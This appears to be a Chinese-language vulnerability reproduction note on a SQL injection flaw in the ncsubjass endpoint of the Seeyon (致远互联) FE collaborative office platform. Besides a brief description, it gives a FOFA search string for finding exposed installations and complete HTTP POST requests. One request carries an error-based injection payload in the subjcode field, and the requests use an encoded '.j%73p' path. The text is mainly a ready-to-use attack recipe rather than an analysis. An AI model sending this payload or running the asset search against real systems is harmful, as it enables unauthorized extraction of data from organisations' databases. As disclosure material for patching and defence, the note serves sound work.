登录 白背景

致远互联FE协作办公平台ncsubjass存在SQL注入漏洞

一、漏洞简介

北京致远互联软件股份有限公司致远互联FE协作办公平台ncsubjass存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 致远互联-FE协作办公平台

三、资产测绘

  • fofaapp="致远互联-FE"
  • 特征

1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png

四、漏洞复现

POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

subjcode=1%27AND+2523+IN+%28SELECT+user%29--+kffo

1718645511154-0b4d59f4-12c4-4e52-b069-17962b2d8569.png

POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

subjcode=1

1718645602176-0994b02b-0897-4bde-b021-13f05751cef5.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rxmnk14ww0za2asn